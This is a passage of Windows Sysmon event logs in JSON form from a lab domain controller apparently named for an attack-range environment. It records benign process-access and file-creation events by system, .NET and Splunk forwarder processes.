C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-001006AE0F00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-001006AE0F00}","TargetProcessId":"2988","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.443\r\nSourceProcessGUID: {41C8662E-2293-5F25-0000-001006AE0F00}\r\nSourceProcessId: 2988\r\nSourceThreadId: 2252\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.443","SourceProcessGUID":"{41C8662E-2293-5F25-0000-001006AE0F00}","SourceProcessId":"2988","SourceThreadId":"2252","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:43.615\r\nProcessGuid: {41C8662E-2293-5F25-0000-0010F5AA0F00}\r\nProcessId: 892\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\37c-0\\System.Security.dll\r\nCreationUtcTime: 2020-08-01 08:06:43.615","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:43.615","ProcessGuid":"{41C8662E-2293-5F25-0000-0010F5AA0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\37c-0\\System.Security.dll","CreationUtcTime":"2020-08-01 08:06:43.615","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.662\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00106AB00F00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.662","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00106AB00F00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.662\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00106AB00F00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.662","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00106AB00F00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00106AB00F00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 